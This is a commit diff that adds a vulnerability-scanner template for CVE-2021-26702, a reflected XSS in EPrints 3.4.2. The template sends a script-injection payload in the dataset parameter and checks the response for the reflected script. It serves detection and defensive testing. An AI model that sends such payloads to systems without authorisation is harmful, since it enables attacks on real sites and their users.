commit
fc0e40c96a
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2021-26702
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: EPrints 3.4.2 XSS
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: medium
|
||||||
|
description: EPrints 3.4.2 exposes a reflected XSS opportunity in the dataset parameter to a cgi/dataset_ dictionary URI.
|
||||||
|
reference:
|
||||||
|
- https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
|
||||||
|
- https://files.eprints.org/2548/
|
||||||
|
tags: cve,cve2021,xss,eprints
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu</title></script><script>alert(document.domain)</script>"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "</title></script><script>alert(document.domain)</script>"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue